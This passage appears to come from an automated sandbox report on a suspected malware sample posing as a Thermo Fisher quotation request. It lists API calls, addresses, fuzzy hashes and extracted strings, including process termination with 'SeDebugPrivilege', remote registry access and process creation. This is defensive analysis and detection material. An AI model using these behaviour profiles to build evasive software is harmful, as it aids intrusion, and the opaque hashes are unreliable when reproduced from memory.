                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                              • String ID:
                                                              • API String ID: 560350794-0
                                                              • Opcode ID: bc06d33ab69a11f2c17b414b6bca117ffaa8a590537890b77f15411b1b69dc5a
                                                              • Instruction ID: f70ccb166756d89e566b10354efbd592d5161437f83021c92cd9ab0f37677852
                                                              • Opcode Fuzzy Hash: bc06d33ab69a11f2c17b414b6bca117ffaa8a590537890b77f15411b1b69dc5a
                                                              • Instruction Fuzzy Hash: A7F11971A00209EFCF04DF94C884EAEB7BAFF49315F109559F905AB250DB31AE46CB50
                                                              APIs
                                                              • _memset.LIBCMT ref: 006624F5
                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00662688
                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006626AC
                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006626EC
                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0066270E
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0066286F
                                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 006628A1
                                                              • CloseHandle.KERNEL32(?), ref: 006628D0
                                                              • CloseHandle.KERNEL32(?), ref: 00662947
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                              • String ID:
                                                              • API String ID: 4090791747-0
                                                              • Opcode ID: c66019b5926e2fc1cef03ba6df7697ab6bef4022213e04d594dea6bda3b71394
                                                              • Instruction ID: 423714ce92828be50f8be8f0c6d42791003e45c2f7bfae2cbacc678282c4ef10
                                                              • Opcode Fuzzy Hash: c66019b5926e2fc1cef03ba6df7697ab6bef4022213e04d594dea6bda3b71394
                                                              • Instruction Fuzzy Hash: F8D1B131604601DFCB54EF24C8A1AAEBBE6BF85310F18855DF8899B3A2DB31DC45CB56
                                                              APIs
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0066B3F4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: InvalidateRect
                                                              • String ID:
                                                              • API String ID: 634782764-0
                                                              • Opcode ID: 43a79e9d321bded1dc480c1b4e23e83d827895acc7122f477b9baee01c4f36bc
                                                              • Instruction ID: f2415add5e253e449243be741e56861c67b963dc73069dd27c8d885dc6739ffe
                                                              • Opcode Fuzzy Hash: 43a79e9d321bded1dc480c1b4e23e83d827895acc7122f477b9baee01c4f36bc
                                                              • Instruction Fuzzy Hash: 54517C31600208FBEF209F298C85BE97BA7AB05324F646115F615E63E2DB71E9D08B55
                                                              APIs
                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0067DB1B
                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0067DB3C
                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0067DB51
                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0067DB6E
                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0067DB95
                                                              • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0061A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0067DBA0
                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0067DBBD
                                                              • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0061A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0067DBC8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                              • String ID:
                                                              • API String ID: 1268354404-0
                                                              • Opcode ID: ffdfc739674e807853b5d71322cb2588ac20ccf400bea5f71c60155bcbb37060
                                                              • Instruction ID: 206ebf51cd9ab3e813aecf0742d279287d167c2ef4710b10c3076d1e25862e6e
                                                              • Opcode Fuzzy Hash: ffdfc739674e807853b5d71322cb2588ac20ccf400bea5f71c60155bcbb37060
                                                              • Instruction Fuzzy Hash: D2518A74600208EFDB20DF69CC91FEA77BAAF49750F144619F94A9B2D1D7B0AD90CB50
                                                              APIs
                                                                • Part of subcall function 00646EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00645FA6,?), ref: 00646ED8
                                                                • Part of subcall function 00646EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00645FA6,?), ref: 00646EF1
                                                                • Part of subcall function 006472CB: GetFileAttributesW.KERNEL32(?,00646019), ref: 006472CC
                                                              • lstrcmpiW.KERNEL32(?,?), ref: 006475CA
                                                              • _wcscmp.LIBCMT ref: 006475E2
                                                              • MoveFileW.KERNEL32(?,?), ref: 006475FB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                              • String ID:
                                                              • API String ID: 793581249-0
                                                              • Opcode ID: 404cb2e9a92e4358765c32f41e51edd93cd57c8afde12cd8d2cfb234c11e3ac0
                                                              • Instruction ID: 7c41d38c3c5702716b47b3106b24b3ae9821c5e77556abd3c7c91a6d83ab5bdc
                                                              • Opcode Fuzzy Hash: 404cb2e9a92e4358765c32f41e51edd93cd57c8afde12cd8d2cfb234c11e3ac0
                                                              • Instruction Fuzzy Hash: AD5132B2A092299BDF94EB94E8419DE73BE9F08310B0041AEFA05E3141EB74D7C5CF64
                                                              APIs
                                                              • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0067DAD1,00000004,00000000,00000000), ref: 0061EAEB
                                                              • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0067DAD1,00000004,00000000,00000000), ref: 0061EB32
                                                              • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0067DAD1,00000004,00000000,00000000), ref: 0067DC86
                                                              • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0067DAD1,00000004,00000000,00000000), ref: 0067DCF2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ShowWindow
                                                              • String ID:
                                                              • API String ID: 1268545403-0
                                                              • Opcode ID: 8e503b0c0731b3b5af81d7885feae9ae65f53187098f986c9d09c5df34118b43
                                                              • Instruction ID: 227b26124d879ec907d9d5d7190cbe43ad249accfb251c1208f0f99faf5a6cc6
                                                              • Opcode Fuzzy Hash: 8e503b0c0731b3b5af81d7885feae9ae65f53187098f986c9d09c5df34118b43
                                                              • Instruction Fuzzy Hash: F941E97020D680ABD73547288B8DAFA7BABAF42314F1D580DF44B867A1D672F8C1D321
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0063AEF1,00000B00,?,?), ref: 0063B26C
                                                              • HeapAlloc.KERNEL32(00000000,?,0063AEF1,00000B00,?,?), ref: 0063B273
                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0063AEF1,00000B00,?,?), ref: 0063B288
                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,0063AEF1,00000B00,?,?), ref: 0063B290
                                                              • DuplicateHandle.KERNEL32(00000000,?,0063AEF1,00000B00,?,?), ref: 0063B293
                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0063AEF1,00000B00,?,?), ref: 0063B2A3
                                                              • GetCurrentProcess.KERNEL32(0063AEF1,00000000,?,0063AEF1,00000B00,?,?), ref: 0063B2AB
                                                              • DuplicateHandle.KERNEL32(00000000,?,0063AEF1,00000B00,?,?), ref: 0063B2AE
                                                              • CreateThread.KERNEL32(00000000,00000000,0063B2D4,00000000,00000000,00000000), ref: 0063B2C8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                              • String ID:
                                                              • API String ID: 1957940570-0
                                                              • Opcode ID: 396e871a6f62d14521230942e58581da0e7c64327d3590b11fce0ef15d929334
                                                              • Instruction ID: 0f3f7d2f9cf971e02fd66eb8989d4553fdf3d39e79a658b977286f9db19850f0
                                                              • Opcode Fuzzy Hash: 396e871a6f62d14521230942e58581da0e7c64327d3590b11fce0ef15d929334
                                                              • Instruction Fuzzy Hash: C001B6B5240308BFE710ABA5EC8DF6B7BADEB89711F019511FA05DB1E1CA759800CB71
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                              • API String ID: 0-572801152
                                                              • Opcode ID: c88eee54591a5ab0836b37ef23fee21459be29e79850c5158240b971d51770c6
                                                              • Instruction ID: ee2dae52c66faa5f6719848ef0f13e38c93e3271295f811015c774bfd6243bd2
                                                              • Opcode Fuzzy Hash: c88eee54591a5ab0836b37ef23fee21459be29e79850c5158240b971d51770c6
                                                              • Instruction Fuzzy Hash: AFE1A171A00319AFDF14DFA4C881AEE77B6EF48325F144129ED05AB381E770AD49CBA4
                                                              APIs
                                                                • Part of subcall function 0060936C: __swprintf.LIBCMT ref: 006093AB
                                                                • Part of subcall function 0060936C: __itow.LIBCMT ref: 006093DF
                                                                • Part of subcall function 0061C6F4: _wcscpy.LIBCMT ref: 0061C717
                                                              • _wcstok.LIBCMT ref: 0065184E
                                                              • _wcscpy.LIBCMT ref: 006518DD
                                                              • _memset.LIBCMT ref: 00651910
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                              • String ID: X$p2kl2k
                                                              • API String ID: 774024439-2452251221
                                                              • Opcode ID: d65d66e45d30ee0f9bd39a8aeaff125ee61195cea0e738534dce9b72b11a0491
                                                              • Instruction ID: 45fa0696bea1ad4ae5672efc6561d12fc7c7e7406db099bcfc975c66557c5c3e
                                                              • Opcode Fuzzy Hash: d65d66e45d30ee0f9bd39a8aeaff125ee61195cea0e738534dce9b72b11a0491
                                                              • Instruction Fuzzy Hash: 56C1A2705043419FC768EF24C891A9BB7E6BF45350F004A6DF9899B3A2DB70ED05CB86
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _memset
                                                              • String ID: Q\E$[$\$\$]$^
                                                              • API String ID: 2102423945-1026548749
                                                              • Opcode ID: 50f88e2971df99350cbb9cb2cf61846fbfae173f40e31b78928808fd3d38e554
                                                              • Instruction ID: 4aef927a2dbe4a4ff90206834a5bd0eb928d218612f0d5b0492a47c63e57ec7d
                                                              • Opcode Fuzzy Hash: 50f88e2971df99350cbb9cb2cf61846fbfae173f40e31b78928808fd3d38e554
                                                              • Instruction Fuzzy Hash: D5517171D402099FDF28CF98C8817EEB7B3EF94314F24816AD858A7391E770AD858B85
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00669B19
                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 00669B2D
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00669B47
                                                              • _wcscat.LIBCMT ref: 00669BA2
                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00669BB9
                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00669BE7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window_wcscat
                                                              • String ID: SysListView32
                                                              • API String ID: 307300125-78025650
                                                              • Opcode ID: b23154f31aa061fd643e0a8cd0dafa7ebbd42dfddff87cde6327c2941c93b6ee
                                                              • Instruction ID: b3a38d4bd75e16c636d1e8ed07c561ba81777025d94849da9e3f41bc334be7c4
                                                              • Opcode Fuzzy Hash: b23154f31aa061fd643e0a8cd0dafa7ebbd42dfddff87cde6327c2941c93b6ee
                                                              • Instruction Fuzzy Hash: 4441AF70A40308ABDB219FA4DC85FEA77FEEB08350F10052AF945A7292D6719D85CB64
                                                              APIs
                                                                • Part of subcall function 00646532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00646554
                                                                • Part of subcall function 00646532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00646564
                                                                • Part of subcall function 00646532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 006465F9
                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0066179A
                                                              • GetLastError.KERNEL32 ref: 006617AD
                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006617D9
                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00661855
                                                              • GetLastError.KERNEL32(00000000), ref: 00661860
                                                              • CloseHandle.KERNEL32(00000000), ref: 00661895
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                              • String ID: SeDebugPrivilege
                                                              • API String ID: 2533919879-2896544425
                                                              • Opcode ID: 3e942ae266f6732f5d8952b450762cbfc43caeddc881aac5031a60f4be1a90ec
                                                              • Instruction ID: cd112c8947824dc659ab321a39c1c03d32150f43700ac0782e5a9178eb336f9a
                                                              • Opcode Fuzzy Hash: 3e942ae266f6732f5d8952b450762cbfc43caeddc881aac5031a60f4be1a90ec
                                                              • Instruction Fuzzy Hash: 6541BE71600201AFDB45EF64C9A5FAEB7A7AF55310F08805CFA069F3C2DB78A944CB95
                                                              APIs
                                                              • LoadIconW.USER32(00000000,00007F03), ref: 006458B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: IconLoad
                                                              • String ID: blank$info$question$stop$warning
                                                              • API String ID: 2457776203-404129466
                                                              • Opcode ID: 05f804dac12776512df10039937433790475b44c25f6c903ca8c5909c887e34e
                                                              • Instruction ID: 475f6bcbecd95f5456f8cf089da577af228441775281ff3ea91465dc224f6b77
                                                              • Opcode Fuzzy Hash: 05f804dac12776512df10039937433790475b44c25f6c903ca8c5909c887e34e
                                                              • Instruction Fuzzy Hash: D411EB71749B76BFE7115A54AC92DEA339F9F15310B30003AF902A53C3FB70AA404769
                                                              APIs
                                                              • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0064A806
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ArraySafeVartype
                                                              • String ID:
                                                              • API String ID: 1725837607-0
                                                              • Opcode ID: 7d4965822e5115571f846c7fc40e8405b558c6d4edb7b9c1367cd17a6e673c4e
                                                              • Instruction ID: 31c24254f669c70339be98857ac75e6c482f0f8d1e1090c8a73981fee331af1a
                                                              • Opcode Fuzzy Hash: 7d4965822e5115571f846c7fc40e8405b558c6d4edb7b9c1367cd17a6e673c4e
                                                              • Instruction Fuzzy Hash: C6C17C75A4421AEFDB00DF98C481BEEB7F6EF08315F244069E605E7381D734A982CB95
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00646B63
                                                              • LoadStringW.USER32(00000000), ref: 00646B6A
                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00646B80
                                                              • LoadStringW.USER32(00000000), ref: 00646B87
                                                              • _wprintf.LIBCMT ref: 00646BAD
                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00646BCB
                                                              Strings
                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00646BA8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                              • API String ID: 3648134473-3128320259
                                                              • Opcode ID: 5e59ba1e69d87ebbd247c1928a6fa70b8bc4428ac73911cc4795e1ffdb9f5294
                                                              • Instruction ID: 80d818db8631cddb6c18641cd46a5d94ad73a473030102a3a7c94c99a1e01a53
                                                              • Opcode Fuzzy Hash: 5e59ba1e69d87ebbd247c1928a6fa70b8bc4428ac73911cc4795e1ffdb9f5294
                                                              • Instruction Fuzzy Hash: 1C0181F2900218BFEB11ABA0DD89EF7376DDB08304F0045A2B746E2181EA749E848F71
                                                              APIs
                                                                • Part of subcall function 00663C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00662BB5,?,?), ref: 00663C1D
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00662BF6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: BuffCharConnectRegistryUpper
                                                              • String ID:
                                                              • API String ID: 2595220575-0
                                                              • Opcode ID: f873f1eef36e8aa4079c846124a0c991df04771248ce1b7d7c4e60df81d189ef
                                                              • Instruction ID: ab4db44287283d26156df0de5657887bf3785512267d85824ce05d14a69e019e
